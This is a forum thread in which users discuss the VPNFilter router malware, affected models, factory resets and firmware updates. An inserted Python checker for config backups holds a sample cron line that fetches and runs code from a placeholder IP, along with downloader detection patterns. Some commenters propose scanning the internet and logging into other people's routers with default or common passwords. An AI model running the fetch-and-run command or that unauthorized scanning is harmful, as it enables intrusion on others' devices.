Unplug it. Count to 10. Plug it back in.
May 30, 2018 2:20 PM

Symantec's FAQ has a list of known affected routers:
Linksys E1200
Linksys E2500
Linksys WRVS4400N
Mikrotik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072
Netgear DGN2200
Netgear R6400
Netgear R7000
Netgear R8000
Netgear WNR1000
Netgear WNR2000
QNAP TS251
QNAP TS439 Pro
Other QNAP NAS devices running QTS software
TP-Link R600VPN
Note that the article mentions that rebooting doesn't fully remove this malware. The recommended remedy is to take note of all your router settings and then follow the steps to restore the router to factory firmware. Then update the firmware if available before putting all your configuration back in (with different admin passwords, natch). And disable any remote management you may have enabled.

This is a huge pain in the ass, but the only way to completely remove it.
posted by JoeZydeco at 2:31 PM on May 30, 2018 [8 favorites]


Already on top of that! (Thanks to a 3 hour power outage yesterday...)
posted by caution live frogs at 2:31 PM on May 30, 2018 [2 favorites]


Will also note that the list above is the list of routers KNOWN to be affected. Who knows if others are also affected. Who knows what other unknown malware is memory-resident in other routers.

It is not a bad idea to reboot whatever router you use, even if it is not on the list.
posted by caution live frogs at 2:34 PM on May 30, 2018 [4 favorites]


Will this get us the election back?
posted by Abehammerb Lincoln at 2:48 PM on May 30, 2018 [32 favorites]


Abehammerb Lincoln: "Will this get us the election back?"

Have you tried unplugging your country and plugging it back in?
posted by octothorpe at 3:51 PM on May 30, 2018 [81 favorites]


Can we just blackhole all of Russia and go back to normal life?
posted by qxntpqbbbqxl at 4:35 PM on May 30, 2018 [4 favorites]


Without an upgrade (that may not exist yet) they'll be reinfected in days if not hours.
posted by sammyo at 4:39 PM on May 30, 2018 [4 favorites]


I was going to use this as an excuse to switch my router to use OpenWRT, but it seems they don't have any information whether their firmware is also vulnerable either. So I guess I'll reboot my router and do... nothing.
posted by meowzilla at 5:10 PM on May 30, 2018 [1 favorite]


Without an upgrade (that may not exist yet) they'll be reinfected in days if not hours.

The article states that the FBI has gained control of the IP addresses used in the malware's initial boot-up stage. This both prevents the infection from progressing into its later stages (because the malware won't be able to download the code it needs for that) and allows the FBI to gather information on the malware itself by inspecting the "phone home" package contents.
posted by tobascodagama at 5:12 PM on May 30, 2018 [6 favorites]


As far as I can tell, those of us using a cablemodem with integrated wifi can reset it, but these devices are managed by the ISP, so it is not necessary.
posted by theora55 at 5:15 PM on May 30, 2018 [1 favorite]


What does Stan Beeman say?
posted by lagomorphius at 5:16 PM on May 30, 2018 [6 favorites]


The article states that the FBI has gained control of the IP addresses used in the malware's initial boot-up stage. This both prevents the infection from progressing into its later stages

The latter doesn't necessarily follow from the former.
posted by snuffleupagus at 5:30 PM on May 30, 2018 [2 favorites]


oh god i can't even take this fucking shit on top of every other fucking shit thing today
posted by jenfullmoon at 6:13 PM on May 30, 2018 [13 favorites]


Would a brief power outage have effectively rebooted my router?
posted by peppermind at 6:13 PM on May 30, 2018


The latter doesn't necessarily follow from the former.

I mean, basically this amounts to "I don't trust the FBI", since they're the source for all of this. Which is a valid stance, but one that should probably be stated explicitly rather than via insinuation.
posted by tobascodagama at 6:39 PM on May 30, 2018 [4 favorites]


FBI is a little too specific, but OK -- just because the FBI has seized control of the command and control IPs doesn't mean that some agency won't try to make hay while the sun shines and install their own backdoors. Which wouldn't make it into the press release.

We know the government tries to do this. It's not a secret. (Anymore.)
posted by snuffleupagus at 6:58 PM on May 30, 2018


I would still probably do it if I had a vulnerable router. Or, toss it and buy something else. But, this doesn't give me the warm and fuzzies.
posted by snuffleupagus at 7:00 PM on May 30, 2018 [1 favorite]


Huh. I had a power outage today as well.... I wonder if it was planned to address just this problem.
posted by xammerboy at 7:28 PM on May 30, 2018


I can't RTFA - I have no internet. :(
posted by bendy at 10:45 PM on May 30, 2018 [1 favorite]


Ironically, something associated with that article froze my browser.

I've done the restart thing since that is easy, but I'm dreading the process of finding passwords and navigating the firmware process.
posted by Dip Flash at 10:59 PM on May 30, 2018 [1 favorite]


Err, any other netjunkies out there notice some odd hiccups and weather today? I was working remotely and found WiFi at a number of small commercial venues handing out lower layer wifi but no DNS/HTTP.

Related?
posted by loquacious at 2:05 AM on May 31, 2018


I was going to use this as an excuse to switch my router to use OpenWRT, but it seems they don't have any information whether their firmware is also vulnerable either. So I guess I'll reboot my router and do... nothing.

According to Wikipedia the VPNFilter malware uses default credentials on the routers to gain initial access. OpenWRT isn't vulnerable because it forces you to set a password on first use (IIRC). Of course, if you set that password to "" then the joke’s on you...

The latter doesn't necessarily follow from the former.

It does in this case, because the persistent part of VPNFilter is just a loader for the rest of it.

FBI is a little too specific, but OK -- just because the FBI has seized control of the command and control IPs doesn't mean that some agency won't try to make hay while the sun shines and install their own backdoors. Which wouldn't make it into the press release.

Sure, but that doesn't mean that it isn't good internet hygiene to wipe out this particular piece of malware.
posted by pharm at 2:33 AM on May 31, 2018 [4 favorites]


So if my router is a piece of consumer trash that overheats under the strain of doing nothing at all, and consequently reboots itself every few hours, that's good for the future of democracy?

I was promised jetpacks godammit. This is hardly an acceptable substitute.
posted by Western Infidels at 7:05 AM on May 31, 2018 [3 favorites]


I made the "reinfection" quip without any research and generally stand by it but REBOOT YOUR ROUTERS, also check if an upgrade is available and install the upgrade, it's generally a 10 minute process.

My base point that I failed to detail was not that the virus would reinstall itself immediately but more that whoever made the initial attack has the IP of the router and can re-use a variation on the original attack.
posted by sammyo at 7:09 AM on May 31, 2018 [1 favorite]


Don't most routers allow you to save down a config file, which you can upload and reinstall after the factory reset? Will that reinfect the device?
posted by stupidsexyFlanders at 8:59 AM on May 31, 2018


Sometimes I think it would be an act of mercy to write a scanner that hunts through IP address ranges for routers with default access, and then sets them to random passwords. Most of the time nobody will ever notice, and if the time comes when the punter needs to change settings, they'll just have to do a factory reset first. Stop this sort of nonsense in its tracks.
posted by Devonian at 9:13 AM on May 31, 2018 [1 favorite]


I was unplugged last night. But I feel better now.
posted by mule98J at 10:07 AM on May 31, 2018


This is a Washington Post link, for any non subscribers who are concerned about using up a click.
posted by Guy Smiley at 12:49 PM on May 31, 2018


stupidsexyFlanders, that config file will probably include the scheduled job to reload the malware, and so that's exactly why SANS recommends a factory reset before upgrading to the newest available firmware.
posted by wenestvedt at 4:34 AM on June 1, 2018
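As an added example (not from this thread, SANS, or any vendor tool), here is the kind of check you would want to run over a saved config file before restoring it, so that a scheduled reload job of the sort wenestvedt describes is caught rather than carried back onto the freshly reset router. The key=value backup format, the cron key names and the 203.0.113.10 address are all constructed for the example.

```python
import re

# Constructed sample of a router configuration export (not a real device dump).
# It mixes benign maintenance jobs with one that fetches and runs code from the
# network, which is what a backup taken from an infected router could carry.
SAMPLE_BACKUP = """\
hostname=home-router
remote_mgmt=0
cron.1=0 3 * * * /usr/sbin/ntpdate -u pool.ntp.org
cron.2=*/5 * * * * wget -q -O /var/tmp/.up http://203.0.113.10/u && sh /var/tmp/.up
cron.3=30 2 * * 0 /sbin/logrotate /etc/logrotate.conf
"""

# key=<five cron schedule fields><command>; only lines of this shape are jobs.
CRON_FIELDS = r"(?:[\d*/,-]+\s+){5}"
CRON_RE = re.compile(r"^(?P<key>[\w.]+)=(?P<sched>" + CRON_FIELDS + r")(?P<cmd>.+)$")
# Traits of a job that pulls code in rather than doing local maintenance.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://")
EXEC_FROM_TMP_RE = re.compile(r"\b(?:sh|ash|bash)\s+/(?:var/)?tmp/")
HIDDEN_FILE_RE = re.compile(r"/\.[\w-]+")


def find_reload_jobs(backup_text):
    """Return (line_no, key, reasons) for each scheduled job in the backup that
    downloads from the network, runs from a temp path, or touches a hidden file."""
    findings = []
    for line_no, line in enumerate(backup_text.splitlines(), start=1):
        m = CRON_RE.match(line.strip())
        if not m:
            continue
        cmd = m.group("cmd")
        reasons = []
        if DOWNLOADER_RE.search(cmd) and URL_RE.search(cmd):
            reasons.append("downloads from a remote URL")
        if EXEC_FROM_TMP_RE.search(cmd):
            reasons.append("executes a script from a temp directory")
        if HIDDEN_FILE_RE.search(cmd):
            reasons.append("references a hidden file")
        if reasons:
            findings.append((line_no, m.group("key"), reasons))
    return findings


def backup_is_safe_to_restore(backup_text):
    """True only when no scheduled job in the backup looks like a reloader."""
    return not find_reload_jobs(backup_text)


if __name__ == "__main__":
    for line_no, key, reasons in find_reload_jobs(SAMPLE_BACKUP):
        print(f"line {line_no} ({key}): " + "; ".join(reasons))
```

The check only reads the exported text, so it can be run on a laptop with no network, and a flagged backup is the cue to re-enter settings by hand instead of restoring the file.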


Devonian: That would probably not be a bad idea. Especially since I would bet that a large percentage of the routers that are being reset are just going to be left at their factory settings, by users who reboot (or even factory reset) them, and then declare victory as soon as they can get to the Internet from their laptop without securing anything.

I presume that the updated firmware for the affected models now requires a password on first use, but most of those passwords will probably be crap too. People are absolutely shit at making up passwords if they don't expect to have to do it, or don't understand the benefit—I've watched people go through a heuristic that's basically: (1) try leaving it blank, (2) if that doesn't work, try "password", (3) if that doesn't work, try whatever password they use for the rest of their shit, which 90% of the time seems to be somebody's birthday in one format or another.

So if someone were going to be the hero we need but don't deserve, they might as well look not only for the default credentials but also at least try the top 10 most common passwords while they're at it.
posted by Kadin2048 at 7:15 AM on June 1, 2018 [1 favorite]

